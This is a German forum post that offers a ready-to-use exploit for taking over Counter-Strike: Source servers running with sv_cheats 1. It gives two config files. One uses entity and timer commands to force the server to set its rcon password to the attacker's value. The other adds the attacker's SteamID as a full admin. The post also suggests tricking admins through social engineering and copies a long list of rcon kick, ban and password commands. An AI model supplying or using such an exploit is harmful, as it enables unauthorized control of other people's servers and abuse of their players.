Hallo liebe leute
Hab in einem anderen Forum ein netten Exploit entdeckt, mit dem man das rCon (remote control) PW von einem Server "hacken" kann.
Einziges Manko: sv_cheats muss auf "1" stehen.
[Server mit sv_cheats 1 findet ihr hier:

]
Ansonsten müsst ihr versuchen mittels "
Social engineering" den Admin darum bitten oder nett fragen, ob er sv_cheats 1 macht
Nungut, fangen wir einfach mal an
Vorbereitung:
Als erstes müsst ihr die ingame console aktivieren, das tut ihr wie folgt:
Öffnet euer Steam, navigiert zu Bibliothek (Libraries), macht Rechtsklick auf "Counter-Strike Source" -> Eigenschaften (Properties) -> Start-Optionen Festlegen (Set Start options) und fügt dort einfach "-console" hinzu.
Das ganze sollte nun so aussehen (bei mir sind noch zusätzliche Parameter mit drin

)
Nun erstellt ihr 2 .cfg's (configs) [Erweiterung bei bekannten Dateitypen ausblenden, wisst ihr ja :P - Hoffentlich!) in dem Ordner "
C:/Programme/Steam/Steamapps/[EUER NAME]/counter-strike source/cstrike/cfg"
Die erste Config nennt ihr "rconhack.cfg" und füllt sie mit folgendem Inhalt:
Quote:
ent_create logic_timer
ent_fire logic_timer addoutput "targetname taketimer"
ent_fire taketimer toggle
ent_fire taketimer addoutput "refiretime 0.01"
ent_fire taketimer enable
ent_fire taketimer addoutput "startdisabled 0"
ent_fire taketimer addoutput "UseRandomTime 0"
ent_fire point_servercommand kill
give point_servercommand
ent_setname point_clientcommand point_servercommand
wait
ent_fire taketimer addoutput "ontimer point_servercommand,command,rcon_password rhack"
wait
rcon_password rhack
say R
|
die zweite config nennt ihr "giveadmin.cfg" und füllt sie hiermit:
Quote:
rcon ma_client addclient "A01"
wait
wait
rcon ma_client addsteam "A01" "STEAM_X:X:XXXXXXXX"
wait
wait
rcon ma_client setaflag "A01" "+#"
wait
wait
rcon ma_client setiflag "A01" "+#"
say A
|
Rot = eure SteamID eintragen (bekommt ihr raus, indem ihr auf einen Server connected und in der console "status" eingebt, nun sucht ihr euren Nickname, direkt gefolgt von eurer SteamID)
Das Exploiten:
Startet euer Game und gebt in die console folgendes ein:
bind "F1" "exec rconhack.cfg"
bind "F2" "exec giveadmin.cfg"
bind "F3" "admin" (
Ist nur sekundär und auch nur ausführbar, wenn "Mani Admin Plugin" auf dem Server ist)
[Die F-Tasten können durch jede beliebige Taste ersetzt werden]
Jetzt sucht ihr euch einen Server auf dem sv_cheats 1 an ist, connected und drückt "
F1", wartet etwas (ca. 5 sek) und drückt dann direkt "
F2".
Nun seid ihr als rcon eingeloggt und könnt jegliche rcon cvars ausführen
Ein paar cvar's:
Here is the list I have compiled so far, enjoy:
//Banning + kicking
This can be done in 2 ways either by typing there name in , or by typing status in your console and there number next to them is the one to enter
Kick - Function
Example:
kick 134
kick noobtker
Ban - Function
Example:
banid 134 0 (adding a 0 makes it permenant and write , if u add 120 it will ban for 2 hours , and the number increments are by the minute)
banid noobtker 0
//Changing the level
Type in : changelevel mapname
Example:
changelevel de_dust2
//Connecting
Type in your console : connect followed by the IP
Example:
connect 127.0.0.0.1
//Password + connect
Type in your console : connect followed by the ip;password "password here"
Example:
connect 127.0.0.0.1;password edwar
//Passwording your server
Type in your console : rcon sv_password password
Example:
rcon sv_password edwar
if you do it right u should see this : server_cvar: "sv_password" "***PROTECTED***"
taking the pass off is easy type in your console rcon sv_password none
//Other Settings
mp_allowspectators 0 =no 1= yes
mp_autokick 0=no 1= yes
mp_buytime 30 // will set it at 30 seconds
mp_c4timer 35 // will set it at 35 seconds
mp_chattime 10 // how long they can chat when the map is about to change
mp_fadetoblack 0= off 1= on
mp_forcecamera 0=off 1=on limited to team only , 2=overview only , 3=chasecam 4 only
mp_fraglimit how many kills a player can get before a new map in the cycle is selected
mp_flashlight 0=off 1=on
mp_friendlyfire 0=off 1=on
mp_hostagepenalty // how many hostages you can kill before you get kicked from the server
mp_limitteams // the number after it decides how many players difference can be on each side
mp_maxrounds // how many rounds will be played before a new map is selected
mp_restartgame // add a number to how many seconds u want it to restart the game in
mp_roundtime // how long the round will last before a new one begins
mp_spawnprotectiontime // how long u can be afk or idle before you get killed
mp_startmoney // how much money you begin with
mp_timelimit // how long a map can last before changing
mp_tkpunish // if you tk (team kill) a player if set to 0=nothing will happen , if set to 1=you will die
mp_winlimit // max number of rounds one team can win before a map change
THX to fpsadmin.com
- rcon changelevel xx_map - changes the map without kicking players
- rcon changemap xx_map - changes map but kicks players from the server
- rcon sv_restartround 1 - restart the map without reloading it
- rcon say "what u want here" - say something through rcon (ie. as admin)
- rcon_password "passwordhere" - login as admin (password being current one)
- rcon mp_flashlight 1 - set flashlight use on
- rcon mp_footsteps 1 - set footsteps on
- rcon mp_friendlyfire 1 - set friendlyfire on
- rcon mp_c4timer 35 - set bomb timer to 35 seconds
- rcon mp_tkpunish 0 - turn off team kill penalty
- rcon mp_forcechasecam 1 - turn on chase cam to your team only
- rcon mp_startmoney 800 - starting money of 800
- rcon mp_limitteams 0 - turn off team limit (make sure it is off)
- rcon mp_freezetime 5 - set buy time to 5 seconds
- rcon mp_timelimit 0 - set timelimit to 0
- rcon mp_autoteambalance 0 - turn off team balancing (make sure it is off)
- rcon mp_maxrounds 10 - set max rounds to 15
- rcon_fadetoblack 1 - sets fade to black on when a person dies.
- rcon kick #number - kicks using server ID number
- rcon kick steam_id - kicks using steam ID
- rcon ban #number kick - kicks using the server ID and bans permanently
- rcon quit - Reboots your server
THX to looki Forum
Hoffe konnte helfen und das gabs hier noch nicht
PS: Beide .cfg's im Anhang als Download